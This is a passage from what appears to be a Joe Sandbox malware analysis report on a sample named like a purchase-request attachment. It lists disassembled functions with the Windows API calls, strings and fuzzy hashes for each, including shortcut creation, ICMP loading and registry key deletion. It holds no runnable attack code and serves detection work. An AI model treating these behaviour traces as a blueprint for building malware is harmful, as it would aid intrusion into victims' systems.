                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ArrayDataSafe$AccessFromStringUnaccess_malloc
                                                        • String ID: crts
                                                        • API String ID: 943502515-3724388283
                                                        • Opcode ID: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                                                        • Instruction ID: ec3ec3aa447b477297a9cb7ebc6a7fbeb91602aa87849f29064a6671b92f781e
                                                        • Opcode Fuzzy Hash: bb55a0f27b70020379d424393c702af5b2eb225910e2ba3c7e40a194fe15662c
                                                        • Instruction Fuzzy Hash: EC213876600A009FC714CF8AE444D97FBE8EF98760714C46AEA49CB721D334E851CB94
                                                        Function 0046E48C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64comCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                        • CoInitialize.OLE32(00000000), ref: 0046E505
                                                        • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                        • CoUninitialize.OLE32 ref: 0046E53D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                        • String ID: .lnk
                                                        • API String ID: 886957087-24824748
                                                        • Opcode ID: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                        • Instruction ID: 8523b4f55483354ee3aaa8e7e2ee5f8b04597d59409be9d2747526508be4cfd1
                                                        • Opcode Fuzzy Hash: ca4e97b0deac3c583c427a3e57c18447ee07ba297a7231e98f3a70961bae8bd6
                                                        • Instruction Fuzzy Hash: E72183312082009FD700EF55C985F4AB7F4AF88729F14866EF9589B2E1D7B4E804CB56
                                                        Function 0045D2C7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 0045D2D2
                                                        • SetVolumeLabelW.KERNEL32(?,00000000), ref: 0045D331
                                                        • SetErrorMode.KERNEL32(?), ref: 0045D35C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$LabelVolume
                                                        • String ID: \VH
                                                        • API String ID: 2006950084-234962358
                                                        • Opcode ID: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                        • Instruction ID: 93ef07912bcba266d24f4400c0aa25f887f93b2782b8649f9ae8f5902fc9f078
                                                        • Opcode Fuzzy Hash: 06ec5ceac71ab965c19bbe619e509a4f86e9865fc889b709aa917be6b1aab059
                                                        • Instruction Fuzzy Hash: 10115175900105DFCB00EFA5D94499EBBB4FF48315B1084AAEC09AB352D774ED45CBA5
                                                        Function 004496E9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                        • GetMenuItemInfoW.USER32 ref: 00449727
                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00449751
                                                        • DrawMenuBar.USER32 ref: 00449761
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Menu$InfoItem$Draw_malloc
                                                        • String ID: 0
                                                        • API String ID: 772068139-4108050209
                                                        • Opcode ID: 08c999079c9288da8331d921eb98ebfa6b916f44b48ff73f34ad091df02caad3
                                                        • Instruction ID: eb12e692e9d899ed3776fa10421b592e4983edb38958d2313c52402e3f8558b6
                                                        • Opcode Fuzzy Hash: 08c999079c9288da8331d921eb98ebfa6b916f44b48ff73f34ad091df02caad3
                                                        • Instruction Fuzzy Hash: 7711A3B1A10208AFEB10DF55DC49BAFB774EF85314F0041AEFA098B250DB759944DFA5
                                                        Function 00472A2B Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 34COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _wcslen$_wcscpy
                                                        • String ID: 3, 3, 8, 1
                                                        • API String ID: 3469035223-357260408
                                                        • Opcode ID: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                        • Instruction ID: 583e1dd4926d5dc430cd1974fab242c37593855fc3f83b6d902887b8cb8118b3
                                                        • Opcode Fuzzy Hash: 12b73319f7521ef091ea4856e2d9fc07411b991347f193140c1b9c5819a8a9d6
                                                        • Instruction Fuzzy Hash: 44F06D61510655E2CB34A791AD917FF72546F44341F00947BD90ED2190F368CB85CF99
                                                        Function 004312CC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312DE
                                                        • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 004312F0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: ICMP.DLL$IcmpCloseHandle
                                                        • API String ID: 2574300362-3530519716
                                                        • Opcode ID: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                        • Instruction ID: fe30dd6f995ef3e52e92cf139519288d45b371df6a06e7fbbc01cfddaae6e452
                                                        • Opcode Fuzzy Hash: 21a2acdac0ba1e2d746e72dbff1012e7ad80fb0484e1fffebf05da08cb8a0c44
                                                        • Instruction Fuzzy Hash: 89E01275500316DFDB105F66D80564B77DCDB14751F10482AFD45E2A51DBB8D48087E8
                                                        Function 004312FE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 00431310
                                                        • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 00431322
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: ICMP.DLL$IcmpCreateFile
                                                        • API String ID: 2574300362-275556492
                                                        • Opcode ID: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                        • Instruction ID: 95e0d00128142f820e0a83de5ed484af687323a382b0c693d148963e73e99334
                                                        • Opcode Fuzzy Hash: c8e81b458e49d693ad0b98c25d1a2273645c6015ec642ff3830cff94addfde50
                                                        • Instruction Fuzzy Hash: E3E0C270400306EFD7107FA5D81464A77E8DB08310F104C2AFC40A2650C7B8D48087A8
                                                        Function 0043129A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(ICMP.DLL), ref: 004312AC
                                                        • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004312BE
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: ICMP.DLL$IcmpSendEcho
                                                        • API String ID: 2574300362-58917771
                                                        • Opcode ID: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                        • Instruction ID: f6e067919a3be2c94262fb81e38fb1c28335358536499f04279aa6303c0198c7
                                                        • Opcode Fuzzy Hash: 8463976e88658be12d547e53f001863c36b7eb8c5d8a0eb88088b9b0d7e59d79
                                                        • Instruction Fuzzy Hash: ADE0C2B0400706DFC7105F65D80465B77D8DB04321F10482BFD80E2610C7B8E48087A8
                                                        Function 00430C7F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 18libraryloaderCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00430C91
                                                        • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00430CA3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProc
                                                        • String ID: RegDeleteKeyExW$advapi32.dll
                                                        • API String ID: 2574300362-4033151799
                                                        • Opcode ID: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                        • Instruction ID: e1e112c22781e886f83f7ab60c8bc672304d94c0271b2a691c2b6ddb7eb549cd
                                                        • Opcode Fuzzy Hash: d4a2309a593705586ca0189df29ebf11fe16cb5b9b4952fb03c76dd6ffec2ddb
                                                        • Instruction Fuzzy Hash: 3FE0C2B0440315AFCB106F6AD95460B7BD89B14321F10583BF980E2600C7B8E88087B8
                                                        Function 00451D2B Relevance: 6.4, APIs: 4, Instructions: 405COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                        • Instruction ID: c5df29d3d24fc858ebdc5227190e2e918b6fbc7f8fe9fd347d916346834f6d96
                                                        • Opcode Fuzzy Hash: 6f77df26dc74fc40ac7bf47809af4b9178697b073442c11c01de5ef3306f6c16
                                                        • Instruction Fuzzy Hash: 66E17F75600209AFCB04DF98C880EAEB7B9FF88714F10859AE909DB351D775EE45CBA0
                                                        Function 00479500 Relevance: 6.2, APIs: 4, Instructions: 162memoryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 0047950F
                                                        • SysAllocString.OLEAUT32(00000000), ref: 004795D8
                                                        • VariantCopy.OLEAUT32(?,?), ref: 0047960F
                                                        • VariantClear.OLEAUT32(?), ref: 00479650
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyInitString
                                                        • String ID:
                                                        • API String ID: 2808897238-0
                                                        • Opcode ID: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                        • Instruction ID: 372c40b5ecffa4d340e825e49f449287305c7189bb1404562c27c74c4f1437f4
                                                        • Opcode Fuzzy Hash: d4078b498bd58c38c4ff211c6799319bb2158b2b01decc8b4cd966ad5c1122ff
                                                        • Instruction Fuzzy Hash: 8251C436600209A6C700FF3AD8815DAB764EF84315F50863FFD0897252DB78DA1997EA
                                                        Function 0046993E Relevance: 6.1, APIs: 4, Instructions: 149windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SendMessageW.USER32(00000000,0000110A,00000004,?), ref: 00469990
                                                        • __itow.LIBCMT ref: 004699CD
                                                          • Part of subcall function 00461C4A: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00461CC2
                                                        • SendMessageW.USER32(00000000,0000110A,00000001,?), ref: 00469A3D
                                                        • __itow.LIBCMT ref: 00469A97
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$__itow
                                                        • String ID:
                                                        • API String ID: 3379773720-0
                                                        • Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                        • Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
                                                        • Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
                                                        • Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
                                                        Function 004499DB Relevance: 6.1, APIs: 4, Instructions: 145COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetWindowRect.USER32(?,?), ref: 00449A4A
                                                        • ScreenToClient.USER32(?,?), ref: 00449A80
                                                        • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                        • Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
                                                        • Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
                                                        • Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
                                                        Function 0041415F Relevance: 6.1, APIs: 4, Instructions: 130COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                        • Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
                                                        • Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
                                                        • Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                        Function 00441672 Relevance: 6.1, APIs: 4, Instructions: 116windowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                        • String ID:
                                                        • API String ID: 1352109105-0
                                                        • Opcode ID: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                        • Instruction ID: 3e4d0a9d31bb6386801ef6381a7f0d6bf168684d8964ff5a195b0ca439f55e04
                                                        • Opcode Fuzzy Hash: efc75fb8ed246b6ad65f2e8b456486d9870e0f063911f7aa846460c85c9d1d50
                                                        • Instruction Fuzzy Hash: 5141A539A002049FE714DF54D884E6AB7B5FF95721F1482AED9158B360DB34AC81CB94
                                                        Function 0045D1AF Relevance: 6.1, APIs: 4, Instructions: 103fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                        Memory Dump Source
